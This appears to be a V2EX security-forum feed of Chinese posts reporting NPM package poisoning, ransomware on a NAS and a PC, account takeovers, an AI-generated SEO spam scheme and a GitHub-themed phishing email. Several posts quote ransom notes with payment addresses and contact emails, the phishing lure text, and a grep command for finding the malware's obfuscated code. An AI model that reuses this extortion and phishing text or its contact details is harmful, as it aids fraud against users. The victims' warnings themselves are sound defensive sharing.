信息安全 way to explore https:https://cdn.v2ex.com/navatar/a4f2/3670/260_normal.png?m=1650095354 https:https://cdn.v2ex.com/navatar/a4f2/3670/260_large.png?m=1650095354 2025-11-27T12:39:27Z Copyright © 2010-2018, V2EX JSON 格式化工具数据泄露 tag:www.v2ex.com,2025-11-27:/t/1175426 2025-11-27T06:50:54Z 2025-11-27T12:39:27Z type member/type 不会真的有人通过 JSONFormatter 分享敏感信息吧

JSONFormatter 和 CodeBeautify 等在线代码格式化工具保存的 JSON 片段,可被公开访问 —— 超过 80,000 条、累计 5 GB 的用户粘贴内容暴露了云访问密钥、数据库凭据、API 令牌等敏感信息

https://www.bleepingcomputer.com/news/security/code-beautifiers-expose-credentials-from-banks-govt-tech-orgs/

]]> NPM 又被投毒盗用户密钥了,影响 posthog, postman 等包 tag:www.v2ex.com,2025-11-24:/t/1174775 2025-11-24T15:40:19Z 2025-11-24T21:42:04Z street000 member/street000 名叫 Shai Hulud 的第二波恶意代码攻击,会通过 NPM preinstall 生命周期脚本执行恶意代码盗取各类 token 和密钥,并通过创建 GitHub Actions 文件来泄露。

看了一下很多周下载量超百万的包都中招了,如 @zapier/zapier-sdk ,@posthog/core ,@asyncapi/specs ,@postman/tunnel-agent 等。

详细报告: https://helixguard.ai/blog/malicious-sha1hulud-2025-11-24

]]>
我一个 web 程序员遇到个离谱 bug,查 bug 查到 windows 上去了 tag:www.v2ex.com,2025-11-24:/t/1174754 2025-11-24T12:11:46Z 2025-11-25T21:37:31Z StoneHuLu member/StoneHuLu
新项目框架,系统正常运行,但是无论怎么 copy 生成的 token ( swagger 调 login 接口或直接 f12 找接口的请求头)都没法用 swagger 成功调用接口,一直解析 token 报错导致 401 ;

然后 token 很长么,肉眼不可读,我把控制台里的 token 和 swagger 生成的 token 复制粘贴到文本对比器里对比结果是毫无差异,放到在线 jwt 解析里 payload 有一半是乱码;

我就麻了,然后想了下,powershell 调用试试,结果出现个特别诡异的情况,我直接鸡皮疙瘩都起来了:我 powershell 调用接口登陆,直接存入变量,用变量调新接口,200ok ,然后我把 token 打印在控制台,ctrl+cv 贴回控制台,再调用,401 了。。。

我就觉得难道是 swagger 和 powershell 都有换行符的问题?我就解析 byte ,查换行符,都没有问题,我就纳了闷了了,最后逼得我没招了,开始笨方法:肉眼一个一个字符读 jwt ,然后我他妈一下头皮都麻了。。。

我就不上图了,结果就是我复制粘贴的 payload 的部分和原始请求返回的 token 里有一段字符不一样,出现了一段 KBM2Af9KHdAbE7JUAS8Mno1TZvNsq6o6C 的乱码;

我当时还不太敢相信,最后用 powershell 的 Set-Clipboard 、Get-Clipboard 模拟了下复制粘贴 token ,结果真的不一样。。

现在我知道 bug 的原因了,但我就是个菜鸡 web 搬砖工,想问问大佬们这到底是为啥,windows 的剪切板还有这种坑吗? ]]>
某种程度,淘宝绕过了支付宝的安全机制了 tag:www.v2ex.com,2025-11-17:/t/1173293 2025-11-17T06:57:57Z 2025-11-10T17:56:12Z vopsoft member/vopsoft 1 孩子通过一个叫海鸥的 app 联系到了骗子

2 孩子用爷爷的淘宝, 扫码协助骗子远程登录了淘宝账号, 骗子开通了淘宝店铺 进行引流 刷单等操作(具体不详)

3 现状:使用 7 年的淘宝号被永久封禁, 支付店铺违约金 1000, 支付骗子未发货的违约金 500, 这里是有个 500 的订单未发货.

4 和淘宝客服沟通,得到的结果是不能解封 并建议注销支付宝.

异地登录还能不审核开通店铺 开通之后还立马出现刷单.

]]>
Semalt.com 用 AI 生成 1000 万+ 虚假页面骗搜索流量, V2EX 内容遭严重滥用 tag:www.v2ex.com,2025-11-17:/t/1173234 2025-11-17T03:32:29Z 2025-11-17T05:37:01Z bOOOOc member/bOOOOc 问题概述

通过 Google 搜索追踪发现,Semalt.com 正在运营一个大规模的 AI 驱动 SEO 欺诈系统. 该系统爬取 V2EX 等技术社区的内容, 使用 AI 生成虚假标题和描述, 然后通过 URL 参数注入到数百个客户网站中, 以劫持搜索引擎流量。

从 URL 中的序列号可以看出, 该系统已生成超过 1000 万个虚假页面.

追踪数据

验证方法

任何人都可以在 Google 搜索以下内容验证:

inurl:"?s-news" inurl:"2025-11" "v2ex" inurl:"?s-news" inurl:"2025-10" "v2ex" 

工作原理

URL 模式

https://[域名]/?s-news-[识别号]-[日期]-[AI 垃圾标题] 

运作流程

  1. 爬取内容 - Semalt 大量爬取 V2EX 页面 (包括用户个人资料页面)

  2. AI 生成虚假新闻 - AI 被输入 V2EX 的页面信息, 被要求编写虚构的随机"新闻", 标题和描述尽可能吸引人. 例如:

    • "WangSD Discontinues Tech Engagement After V2EX Membership Termination"
    • "V2EX 用户 liuliancc 未能加入本站,未成为第 522760 号会员,时间早于 2020 年 12 月 7 日 20 时 37 分"
    • "Innovative Personal News Briefing System Proposed by V2EX Member FFM"
    • "V2EX Member Wang Shares Insights on MacBook Pro..."
  3. 参数注入 - 通过 URL query parameters 将生成的内容注入到客户网站

  4. 搜索引擎索引 - Google 索引这些页面, 将 AI 生成的欺骗性虚假标题和描述编入搜索结果

  5. 流量劫持 - 用户搜索 V2EX 相关内容时, 看到大量"神秘 V2EX 小新闻", 点击后被导向完全不相关的网站

搜索结果截图

Google 搜索 inurl:"?s-news" inurl:"2025-10" "v2ex"

Google 搜索 inurl:"?s-news" inurl:"2025-10" "v2ex"

Google 搜索 inurl:"?s-news" inurl:"2025-11" "v2ex"

甚至搜索我自己的 V2EX 用户名 "bOOOOc" 时, 都能找到使用 Semalt SEO 欺诈手法的网站. Google 搜索我的 V2EX 用户名

可以看到这些 AI 生成的虚假标题都含有 v2ex

实际的例子

以下是实际发现的虚假页面示例:

例 1:地方新闻网站

https://lufkindailynews.com/test/?s-news-7728932-2025-11-11-v2ex-userliuliancc... 

例 2:伊朗通讯社

https://www.isna.ir/news/...?s-news-8218190-2025-11-12-member-of-v2ex-exploring... 

例 3:哥伦比亚大学

https://globalfreedomofexpression.columbia.edu/about/...?s-news-3135576... 

受影响的域名(部分)

初步发现涉及数百个域名,包括但不限于:

新闻媒体:

教育机构:

商业网站:

其他:

这些网站是 Semalt 的付费客户,购买了其"autoSEO"或者"AIO Promotion"服务。 但这些客户可能:

  1. 完全知情并接受这种黑帽手段
  2. 不完全了解 Semalt 的具体操作方式,以为是正规 SEO
  3. 只关心流量数字,不在乎来源和方式

AI 生成内容的展示

  1. 编造戏剧性事件

    • 把"用户注销账号"编成"被开除并停止技术讨论"
    • 例如:"WangSD Dismissed from V2EX and Discontinues Tech Engagement"
  2. 把数据记录包装成新闻

    • 将后台数据编成"独家报道"
    • 例如:"V2EX 用户 liuliancc 未能加入本站,未成为第 522760 号会员,时间早于 2020 年 12 月 7 日 20 时 37 分"
  3. 虚构创新提案

    • 从关键词中提取,编造不存在的"重大创新"
    • 例如:"Innovative Personal News Briefing System Proposed by V2EX Member FFM"
  4. 普通求助变专家见解

    • 把"救命,我的 MBP 坏了"包装成"资深用户专家分析"
    • 例如:"V2EX Member Wang Shares Insights on MacBook Pro Problems"

Semalt 将爬取的数据无差别地输入 LLM, 要求生成"吸引眼球的新闻", 完全不在乎内容的任何真实性.

为什么我认为是 Semalt.com

直接证据:重定向追踪

在测试这些虚假页面时, 发现点击某些页面会被重定向到以下域名:

这些域名直接指向 Semalt 及其关联服务. 其中 podbex.com 直接重定向至 semalt.com aio.com.ai 的其中一个 google chrome 浏览器扩展的开发者是"Semalt LLC" semalt.com/autoseo 是 Semalt 的自动化 SEO 服务页面, 正是生成这些虚假页面的产品.

Semalt 的历史劣迹

Semalt.com 在 SEO 社区中早已臭名昭著:

referrer spam (引荐垃圾)

aggressive crawling (激进爬虫)

黑帽 SEO 服务

社区讨论

商业模式吻合

  1. 不择手段获取流量
  2. 规模化操作
  3. 欺骗搜索引擎
  4. 滥用他人品牌

这些虚假的 AI 垃圾仍然在极速增速生成

根据识别号变化推算:

时期 识别号范围 日均生成量
10 月中旬 120 万 → 290 万 约 12 万/天
10 月底-11 月初 290 万 → 770 万 约 37 万/天
11 月中旬 770 万 → 1007 万 约 44 万/天

按当前速度计算:


希望站长能考虑屏蔽 Semalt 的爬虫访问 (他们似乎不在乎 robots.txt)

]]>
这几天有没有人收到来自 12340 的短信? tag:www.v2ex.com,2025-11-14:/t/1172889 2025-11-14T11:07:36Z 2025-11-14T12:31:13Z droidmax61 member/droidmax61 12340.link ,没有落款,发件号码为 12340 ,有关部门还没有答复情况是否属实 ]]> 大厂研发的信息保护技术栈 tag:www.v2ex.com,2025-11-13:/t/1172596 2025-11-13T09:12:16Z 2025-11-13T16:03:24Z axuadm19 member/axuadm19
好像最好的是企业内部划分出红区绿区,红区不能上外网,所有研发工作只在红区进行。

但有一些公司做不到划分区呢,安装 DLP Agent 监控研发人员的行为吗,研发人员都是管理员权限,随时可以停掉 DLP 软件呀。

各位研发大佬们,你们公司是怎么做的。。。 ]]>
NAS 中了勒索病毒了 tag:www.v2ex.com,2025-11-13:/t/1172431 2025-11-13T01:17:30Z 2025-11-13T21:39:16Z guanjinman2022 member/guanjinman2022 小型局域网,系统都是几台 Win10 加 nas 文件共享,有台 Win10 也开局域网共享。 NAS 是 TNAS ( TerraMaster ),系统是 TOS 3.1.10 ,4 个 6TB 磁盘作 Raid5 阵列,大约 18TB 图片( psd 、psb 、tif 、jpg ),只有 NAS 里的图片(.jpg, .psd )被加密成*.anon 文件,还有大量的文件没来得及继续加密。 发现后马上把 nas 断网了,看到硬盘灯还在闪烁于是 nas 先关机 几小时后 win 电脑都正常,没有文件被加密。然后把 nas 单独和一台电脑用一根网线连接,进入 nas 后台,发现桌面上有 README.txt 文件,进入共享文件夹也有 README.txt 文件,还有约 2000 个不重要的旧的 psd 和 jpg 文件被加密,因为断网,被加密文件没有增加,打开 README.txt ,是如下内容:

This IS ANON RTS LOCKER!!!!

Your computers and servers are encrypted, and backups are deleted. We use strong encryption algorithms, so no one has yet been able to decrypt their files without our participation.

Remember: The faster you content us and pay, the discount you will get is bigger.

The only way to decrypt your files is to purchase a universal decoder from us, which will restore all the encrypted data and your network.

YOUR PERSONAL ID : 666048752d44d8429c2a463ce6cbf1a9115cbc57e58ed4834321202859a58e490e327e26ddf28fb6a6538e3911faa309db4437d15f1297d1ae42889721155c4ec57b8dcb3d8eda3ca5c40f09b8a8fa084cecf4b437ace2998dc3c5edc41fcc4239c943bf0d623f01ef62e2e031f5187f607d8146fac048355cd83174e8d3b8850275d1925f7a582e13d8615934510f756f73c1102bbbb674c67a2ecc6e1a6f089e1bea550efba588531d64380395bd39e9117239df03abe2b4dca3ec6bf0e78e688b636ffebd4704238f515f9dbcd464cb1cda8b333e9c205f30317ba29dbafebb712629f2947c6b3bbc1604b305f93de06f418aede47baf6c89135e55ce6631

Follow our instructions below, and you will recover all your data:

  1. Pay 0.01 BitCoin to Our address.

Address 1 : bc1q74stt84cqhs4c0tmj4rj3rwfa6ef7dc90gg33a

Address 2 : bc1q7ufxwf8zde63f7zgr9hnjjutq3uez2fjp0gyvl

Address 3 : bc1qr5rdc4eewlkct5durxk8nkqm02w0qr6wqtpkg4

P.S: If you don't know what is BitCoin, you can google how to use the exchange pay to us. Or you can find the third-part solution services to ask for their help.

  1. Send us message with transaction id and your personal id.

TOX ID : 74E8C99142A3DC785F71CE4B88BA42E4DA725E40A162F1FAC0BE16DD9213895A276C98E3DEC9

Email 1 : anon@gartnersdwan.top

Email 2 : anon2025@keemail.me

  1. Launch decryptor.exe, which our supportor will send you through email.

What guarantees?

We value our reputation. If we will not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is tested by time and will decrypt all your data.

!!! DO NOT TRY TO RECOVER ANY FILES YOURSELF. WE WILL NOT BE ABLE TO RESTORE THEM!!!

现在的做法是:把那台 nas 已经断开外网,只和一台电脑连接。明天再观察局域网里其他电脑上有没有图片被加密(刚开始观察几小时后都正常),如果确定没有,那么只有 nas 被入侵而已。据网上查询,一个星期前也有一家公司的 nas 文件被加密,情况和我的一样,只是那家怀疑电脑中病毒了隔离,然而 nas 一直联网导致 nas 上的所有文件被加密了。我是幸运早发现了,就把 nas 断开了,然后也有约 2000 个文件被加密,只是这些文件是早期的,没什么价值,被加密的文件现在也不碰,等以后出现解密工具后再去试试解密,那些没被加密的文件都正常,也可以使用。然后我把 nas 设置里供远程访问的禁用,网关也禁用(或者改下数字使之失效),nas 本来就只在局域网提供文件共享用的。明天把 nas 重新连接到局域网密切观察被加密文件有没有增多,如果在继续加密文件,访问 nas 也会卡顿的,如果正常了,说明就算 nas 里有木马也无所谓。要想根本防治,再买个新 nas 最稳妥,这个就当以后备份用。

被加密成 .anon 文件现在输入在线数据库没匹配,解不开,病毒可能是变种。怀疑不是电脑中的病毒,是 nas 系统有漏洞被入侵,查看日志发现 ip 205.210.31.11 和 198.235.24.167 前 2 天 web 登录过 nas

问下各位有没有碰到类似这种情况是怎么解决的?

]]>
私钥被盗,扫到一个病毒,求大家帮忙看一下 tag:www.v2ex.com,2025-11-12:/t/1172408 2025-11-12T17:52:30Z 2025-11-13T16:22:15Z milkpuff member/milkpuff win10 windows defender 没有扫到病毒,今天装了个火绒扫到一个程序报毒,名字是 FnHotkeyUtility.exe 。请求大家帮忙分析一下,文件是否就是通过这个程序泄露出去的。



病毒文件
链接: https://pan.baidu.com/s/18yAc_YyufZIuqXsFBImq_A?pwd=2jj7 提取码: 2jj7

分析平台结果
https://www.virustotal.com/gui/file/7acdae6297c8a70915eae326aaeb202b7fd7cab4436dbf65d17df682e5058098/detection ]]>
某 CGI 框架安全问题深度研究报告 tag:www.v2ex.com,2025-11-12:/t/1172327 2025-11-12T08:45:09Z 2025-11-12T08:45:09Z droidmax61 member/droidmax61 u37ierve.pinit.eth.limo ]]> 某 CGI 框架的安全初探 tag:www.v2ex.com,2025-11-11:/t/1172099 2025-11-11T10:04:24Z 2025-10-22T11:04:24Z droidmax61 member/droidmax61 4nm6tvc4.pinit.eth.limo

深感「世界是一个巨大的草台班子」 ]]>
现在家用路由器是不是基本都无法解决 ARP 攻击问题?不是所有的流量都需要通过路由器中转吗,路由器完全有能力丢弃非法的 ARP 包吧 tag:www.v2ex.com,2025-11-11:/t/1171859 2025-11-11T00:10:07Z 2025-11-11T08:50:45Z drymonfidelia member/drymonfidelia 没想到竟然被盗号了(supercell) tag:www.v2ex.com,2025-11-10:/t/1171774 2025-11-10T08:46:25Z 2025-11-01T10:58:00Z muchengxue member/muchengxue supercell 有名的游戏就是部落冲突/皇室战争了,前几年新款必玩,今年没怎么玩了,前几天看到爆裂小队停服,想下载看看补偿活动,结果发现登录不了,他家的游戏可以通过 supercellID (也就是 email 获取验证码)来恢复游戏进度。
我的 email 是 Gmail ,半天都没收到验证码邮件,然后去垃圾邮件一看,果然有,但是提示说没有相应的账号,然后再看,发现半个月前也有 supercell 的邮件,分别是异地登录和换绑 email 。
现在懵逼的是不知道怎么被盗号了,大概是 Gmail 被盗了,我还绑定了安全邮箱,一般换设备登录都会收到邮箱,但是那段时间没收到。

]]>
完蛋,中病毒了,有没有解法?勒索病毒 tag:www.v2ex.com,2025-10-29:/t/1169284 2025-10-29T22:37:52Z 2025-11-03T12:43:56Z jccaipc member/jccaipc 前两天 ASP.NET Core 爆出来的 9.9 分超大漏洞 CVE-2025-55315 影响 ASP.NET Core 5.0/6.0 吗? tag:www.v2ex.com,2025-10-20:/t/1167113 2025-10-20T10:36:58Z 2025-10-20T16:38:17Z drymonfidelia member/drymonfidelia
看漏洞介绍是只影响 2.3/8.0/9.0

看介绍是构造恶意 TCP 包,前面有个 nginx 反代,还会受影响吗 ]]>
edge 打开 https://www.amazon.com/报病毒? tag:www.v2ex.com,2025-10-20:/t/1167060 2025-10-20T08:15:14Z 2025-10-20T09:54:33Z luckyc member/luckyc 病毒名称:TrojanDownloader/JS.Nemucod.ca
病毒 ID:7B6021C2F865A0BF
病毒 URL: https://images-na.ssl-images-amazon.com/images/I/A1ViNTitEGL.js?AUIClients//ACICAssets >> https://images-na.ssl-images-amazon.com/images/I/A1ViNTitEGL
操作结果:已阻止

进程 ID:11324
操作进程:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
操作进程命令行:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=zh-CN --service-sandbox-type=none --no-pre-read-main-dll --startup-read-main-dll --metrics-shmem-handle=2428,i,12241339043436480535,8395466682992817579,524288 --field-trial-handle=2340,i,17823177130750039219,15780085132379967781,262144 --variations-seed-version --mojo-platform-channel-handle=2492 /prefetch:11
``` ]]>
火绒病毒库停更了吗? tag:www.v2ex.com,2025-10-18:/t/1166694 2025-10-18T19:53:09Z 2025-10-18T20:53:09Z liyafe1997 member/liyafe1997 突然注意到右下角火绒提示病毒库很久没更新了,结果一看上次更新还是 7 月份,怎么检查都是已经最新版?

]]>
校园网的实验室服务器安装代理会有风险吗? tag:www.v2ex.com,2025-10-16:/t/1166261 2025-10-16T16:05:54Z 2025-10-17T16:55:17Z Saunak member/Saunak 使用校园网的实验室服务器安装代理会有风险吗? 之前有次不小心 gradio 暴漏了端口(没造成了实质性影响)就被学校网格找上门了

所以想问下如果在课题组的服务器上装了代理会不会被识别连接到外网之类的找上门?或者本身有安全风险吗?

]]>
请教各位大佬医疗隐私数据是如何获取的 tag:www.v2ex.com,2025-10-15:/t/1165260 2025-10-15T00:02:06Z 2025-10-15T15:25:00Z saberlove member/saberlove 今天看到一个公司的宣传 pdf ,声称可以针对个人获取全国范围内的医院就诊轨迹,数据包括时间,科室,金额,医保覆盖率比,具体诊断信息等,并且信源覆盖了全国。重点是覆盖全国。 我想问问这个数据是通过什么渠道拿到的,并且通过截图可以看到非常详细的信息,包括个人隐私信息。医疗票据信息,收费票据页信息,费用明细信息。

]]>
逆向安全工程学习,这方面有人需求吗? tag:www.v2ex.com,2025-10-09:/t/1163960 2025-10-09T08:47:43Z 2025-10-09T09:43:06Z CCCCCCCCCCCCCCCC member/CCCCCCCCCCCCCCCC 首先,逆向安全工程大佬还是很多,我自己应该偏向于实战派,我逆向过(完整的有结果的)有不下 50 款相关游戏/App ,且跟真实市场交过手,拿到过结果。

逆向安全的收益
1 写代码知道计算机底层的走向,学习上层技术更加笃定。 #实用
2 面试/答辩晋级啥的几乎可以说出比较深入的理解,还可能反将面试官一军。#价值高
3 写代码关注网络安全,以及一些其他容易漏出的破绽 bug 。 #实用
4 后续能力达到,可以接一些副业或者自己创业。 #长期价值可积累,因为底层短期基本不会变

目标用户:几乎 90%的程序员(拍脑袋的数据)。

不知道上面的价值是否有需求,如果有需求我打算输出一些,前期可能是一些实战的一些资料,因为这是我平时产出,还是比较多的,后期的话,看需求看看往哪个方向发展。 ]]>
钉钉现在被盗号这么简单嘛 tag:www.v2ex.com,2025-09-26:/t/1161999 2025-09-26T06:19:06Z 2025-09-27T22:56:58Z asdhak member/asdhak 疑似 GitHub × Gitcoin 的骗局 tag:www.v2ex.com,2025-09-23:/t/1161205 2025-09-23T02:45:52Z 2025-09-23T09:02:22Z lait member/lait 今天收到来自 notificationpromo[bot] notifications@github.com 的邮件:

📌 GitHub × Gitcoin Developer Fund 2025 Dear community, We are excited to introduce the upcoming phase of the GitHub Developer Fund, a joint program with Gitcoin designed to highlight and support those who strengthen open-source technologies and digital public goods. Your GitHub account qualifies for participation in this phase. We value every type of involvement — from occasional contributions to long-term commitment — as essential to shaping the future of open source. Program overview: Funding approach: Quadratic Funding, boosting community influence through a shared pool Total allocation: $15,000,000 USDC Eligibility: Active participation and potential future impact — open to everyday contributors and maintainers, not just project founders Next step: To secure your preliminary registration and confirm eligibility, please verify your wallet using Gitcoin Passport. This ensures fairness, protects against Sybil attacks, and never requests personal data. Verification takes under a minute: connect your wallet and sign a message. Please note: The authorization requires a refundable deposit, which will be fully returned after the process is completed. 📝 Continue with authentication and submission here: https://grants.github.com/apply Participation and funding eligibility are finalized only with a valid Gitcoin Passport score. Full guidelines are available on our portal. Best regards, GitHub Developer Fund Team In partnership with Gitcoin This message was sent to you as a registered GitHub user. ©2025 GitHub, Inc. All rights reserved. Address: 88 Colin P Kelly Jr St, San Francisco, CA 94107, USA. [Manage notifications] | [Privacy Policy] 

点邮件里 https://grants.github.com/apply 实际指向了 https://github-fund.com/

邮件是借助 GitHub 的 ieeues @xx 功能自动触发通知邮件产生,原始仓库地址: https://github.com/gitcoinoda/org/issues

大家注意防范!!!

]]>
出入站公网 IP 不一致 tag:www.v2ex.com,2025-09-20:/t/1160704 2025-09-20T07:15:38Z 2025-09-22T01:06:42Z droidmax61 member/droidmax61 火绒报告:搜狗输入法被曝云控模块暗中篡改浏览器配置 tag:www.v2ex.com,2025-09-20:/t/1160687 2025-09-20T05:15:28Z 2025-09-21T19:56:51Z laikicka member/laikicka 火绒安全威胁情报中心近日发现,一款专门锁定浏览器主页的病毒正在加速传播,其源头指向搜狗输入法。该病毒通过搜狗输入法的 Shiply 云控模块精准推送配置,结合用户画像进行灰度测试后大范围推广。推广模块会检测用户设备上的杀毒软件,随后强制修改 Edge 和 Chrome 浏览器的主页及默认搜索引擎设置,跳转至带有来源标识的推广链接。目前,火绒安全产品已可拦截并查杀相关模块。

此外,报告还指出搜狗输入法通过云控配置实现弹窗广告推送,部分情况下用户难以彻底关闭弹窗。火绒建议用户可尝试通过系统通知设置或输入法自带选项关闭弹窗,但由于云控精准投放,部分用户可能仍受影响。

火绒安全 ( https://mp.weixin.qq.com/s/4lfqX9HYQhl1un8dYbc1hg)

]]>
邮箱内发现自己写给自己的邮件 tag:www.v2ex.com,2025-09-14:/t/1159100 2025-09-14T08:23:15Z 2025-09-14T18:25:38Z ruizhixia member/ruizhixia 自己发件记录没有发过这种邮件
过了时限什么也没发生
我估计没被黑但好奇别人是怎么做到用我的地址发信的? ]]>
我这 Outlook 邮箱是不是被爆破了? tag:www.v2ex.com,2025-09-14:/t/1159050 2025-09-14T01:04:52Z 2025-09-14T14:00:35Z jacketma member/jacketma Microsoft 帐户团队发送邮件:

登录活动异常 已检测到最近登录到 Microsoft 帐户 ja**a@outlook.com 的一些异常。 登录详细信息 国家/地区: 埃及 IP 地址: 41.35.196.249 日期: 2025/9/13 22:51 (GMT) 平台: Android 浏览器: Android 请转到最近活动页,让我们确定这是否是你本人。如果不是,我们将帮助你保护帐户。如果是,我们将在以后信任类似活动。 

在异常活动记录里有一条记录:

会话类型 检测到异常活动 大概位置 埃及 时间(GMT) 昨天 22:51 设备/平台 Android 浏览器/应用 Android IP 地址 41.35.196.249 帐户别名 ja**a@outlook.com 会话活动 检测到异常活动 

我检查了昨天所有的访问路线,从来没有使用过埃及的 IP ,我这 Outlook 邮箱是不是被埃及人登录了?

]]>
有没有简单高效可靠的方法防止 web 服务半夜定时执行的耗时任务被恶意执行? tag:www.v2ex.com,2025-09-12:/t/1158678 2025-09-12T00:14:38Z 2025-09-12T07:57:43Z shendaowu member/shendaowu 我要求是不是太多了?如果属于不可能三角的话可以去掉高效。反正本来就是很耗时的任务,除非会大幅影响其他页面的延迟之类的。

耗时任务是一些数据库查询,还有数据库备份,可能还会有别的。每天每种只执行一次。

我目前计划用 cron 定时访问 web 服务的一个地址。后端语言是 Go 。Go 有个很多人用的第三方的 cron 库,但是五年没更了,看 issue 好像也不是没问题,不敢用。

我问 deepseek 它说验证源 IP 是不是 127.0.0.1 、::1 、localhost 就行了。另外需要注意一些特殊情况。比如代理、负载均衡器和容器。这个有漏洞吗?还要不要在耗时任务执行之前加个时段判断和今天是否已经执行过了?还有当前是否正在执行耗时任务。cron 好像在特殊情况下会重复执行?比如修改系统时间。

主要需求就是防止这个东西成为被攻击的点。

]]>
最近海外有一个爆料,就是 OAuth token 被利用导致大量用户数据泄露。但是在国内没有声音。 tag:www.v2ex.com,2025-09-10:/t/1158235 2025-09-10T03:24:18Z 2025-09-10T05:00:02Z moverinfo member/moverinfo https://cloud.google.com/blog/topics/threat-intelligence/data-theft-salesforce-instances-via-salesloft-drift

Google Threat Intelligence Group (GTIG) is issuing an advisory to alert organizations about a widespread data theft campaign, carried out by the actor tracked as UNC6395. Beginning as early as Aug. 8, 2025 through at least Aug. 18, 2025, the actor targeted Salesforce customer instances through compromised OAuth tokens associated with the Salesloft Drift third-party application.

]]>
大家千万别随便点击链接了, npm 上 18 个流行的软件包又被投毒了 tag:www.v2ex.com,2025-09-09:/t/1158008 2025-09-09T06:17:43Z 2025-09-09T08:07:08Z rmrf member/rmrf 原帖: https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised

2025 年 9 月 8 日,Aikido 安全团队通过其情报系统发现,npm 上 18 个流行的软件包被推送了包含恶意代码的新版本。这些软件包每周下载量超过 20 亿次,包括 backslash 、chalk-template 、supports-hyperlinks 等。

被投毒的软件作者出来现身道歉了:"我犯了一个错误,像往常一样(因为当时我在用手机)没有直接访问网站,而是点击了链接。"

]]>
昨晚亲历 qix 开发者账号泄露导致 NPM 超大规模投毒事件 tag:www.v2ex.com,2025-09-09:/t/1157924 2025-09-09T01:35:44Z 2025-09-10T08:01:51Z deepbytes member/deepbytes NPM 仓库中多个周下载量超千万的热门组件被投毒,这些组件均为 qix 开发者发布,可能由于其凭证泄漏导致账号被窃取。

昨晚睡前就在 x 上看到各种信息了:

受影响投毒组件被植入恶意的混淆代码 index.js 文件,该恶意代码会劫持浏览器钱包(如 MetaMask )和网络请求( fetch 和 XMLHttpRequest ),拦截 ETH 、BTC 、SOL 、TRX 等加密货币交易,通过替换目标地址将资金转移至攻击者钱包(如 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976 )

混淆后的恶意代码 index.js:

攻击非常有针对性,是针对 web3 相关用户的大规模攻击.这个 Javascript payload 不复杂,使用了 obfuscator.io 或者类似的工具。

这个开发者账号泄密的原因是因为被钓鱼邮件迷惑了,点击了邮件里面的链接,但未验证链接属于正确的官方发布的地址。


目前 VirusTotal 仍无法检测异常。


自检:

 brew install rg rg -uu --max-columns=80 --glob '*.js' _0x112fa8 

参考 hacker news: https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised


提醒,以后这种邮件里面的 login ,如果有 pasaword 管理工具,可以自动对比域名,不对的域名不会显示自动填充的下拉框的! v 友还有啥 tips ,都可以提一下,这些依赖用的人太多了!

]]>
登录接口明文密码在浏览器端先加盐 SHA512 一次,服务端再用 bcrypt 等慢哈希算法二次加密存储是最佳实践吗?为什么多个大厂都发生过不小心在日志输出用户明文密码的事件,不加密或可逆加密传输用户密码仍是主流 tag:www.v2ex.com,2025-09-08:/t/1157900 2025-09-08T20:33:00Z 2025-09-10T02:11:51Z drymonfidelia member/drymonfidelia 如果是为了检测是否是泄露的或者是弱密码,那可以把常用密码数据库同样加盐 SHA512 一次再保存(不过这样就要求 SHA512 的盐全部用户相同)或者把 1000 个常见密码发到客户端,在客户端判断
还有一种方案是 Scrypt KDF 以前在 discord 上看到有人讨论过,有实际应用案例吗 ]]>
克罗地亚 Fina CA 未经 Cloudflare 授权签发了 12 张 1.1.1.1 的证书 tag:www.v2ex.com,2025-09-05:/t/1157329 2025-09-05T07:38:26Z 2025-09-05T15:45:40Z aloxaf member/aloxaf https://blog.cloudflare.com/unauthorized-issuance-of-certificates-for-1-1-1-1/

再次印证了世界是个巨大的草台班子,整个报告读下来过于难绷:

]]>
坐看一些预期可能发生的入侵事件 tag:www.v2ex.com,2025-09-04:/t/1157141 2025-09-04T10:00:07Z 2025-08-25T11:25:41Z carlist member/carlist 事件 1 - EO14117 导致一些美国企业在中国支持全球安全团队被砍,后面都懂得

事件 2 - 基于 LOT 设备的僵尸网络攻击会愈加频繁,可预见的国内电动自行车厂商设备被入侵远程操控

]]>
windows pc 遭遇勒索病毒怎么办 tag:www.v2ex.com,2025-09-04:/t/1157114 2025-09-04T08:44:11Z 2025-09-05T13:12:26Z jason42791593 member/jason42791593 几乎所有文件都被加密为 BA7SIUo0 后缀,留下的勒索信息为: #Warning: Your files have been encrypted.

If you want to get your files back and are willing to pay, please contact us at the email addresses shown below:

btcduess@outlook.com duesbtc@2mail.co

In the subject line, please write your personal ID.

ID: 20B42F2B8E6E282A996D5E54729FFE5B

If you do not message for the files within 24 hours, the price will be doubled and if there is no response, please send a message to the second email.

]]>
X 虽然是端到端消息,但是密码只有四个数字? tag:www.v2ex.com,2025-09-03:/t/1156851 2025-09-03T08:17:18Z 2025-09-03T21:17:18Z liuidetmks member/liuidetmks 这四个数字是什么意思??

本地密钥是由四个数字派生的吗?
感觉不太可能吧,是否是一个锁屏密码,为了防止别人看你手机?

]]>
火绒弹窗倒计时 60 秒,自动强制更新到 6.0 tag:www.v2ex.com,2025-08-29:/t/1155748 2025-08-29T03:56:49Z 2025-09-03T05:18:34Z superrichman member/superrichman 火绒越来越流氓了,之前还有弹窗选则推迟 7 天不更新的选择。今天重启了电脑,直接来个弹窗倒计时 60 秒,数完强制自动升级到 6.0 ,惊呆了。

]]>
你有没有遇到过不太懂“零信任”但喜欢大谈特谈“零信任”,甚至一群不懂零信任的人开会激烈讨论零信任的。 tag:www.v2ex.com,2025-08-27:/t/1155196 2025-08-27T02:18:53Z 2025-08-30T00:38:05Z desdouble member/desdouble 想成为能至少不漏报低水平黑客对网站的入侵的人的话,需要看什么书?至少需要多少时间? tag:www.v2ex.com,2025-08-26:/t/1154898 2025-08-26T00:05:04Z 2025-08-26T15:14:13Z shendaowu member/shendaowu 其实我是想不漏报任何入侵的,但是感觉这个目标可能过于难了。

起因是之前听说开源工具效果都不怎么好。然后今天在谷歌上搜“ossec Useless site:www.reddit.com”的时候看到一个观点,就是工具再多都是不够的,还是要看人。https://www.reddit.com/r/cybersecurity/comments/1ma8zwa/comment/n5cx1qr/ 。我基本上信了。然后我雇不起人,所以想自己成为那种人。

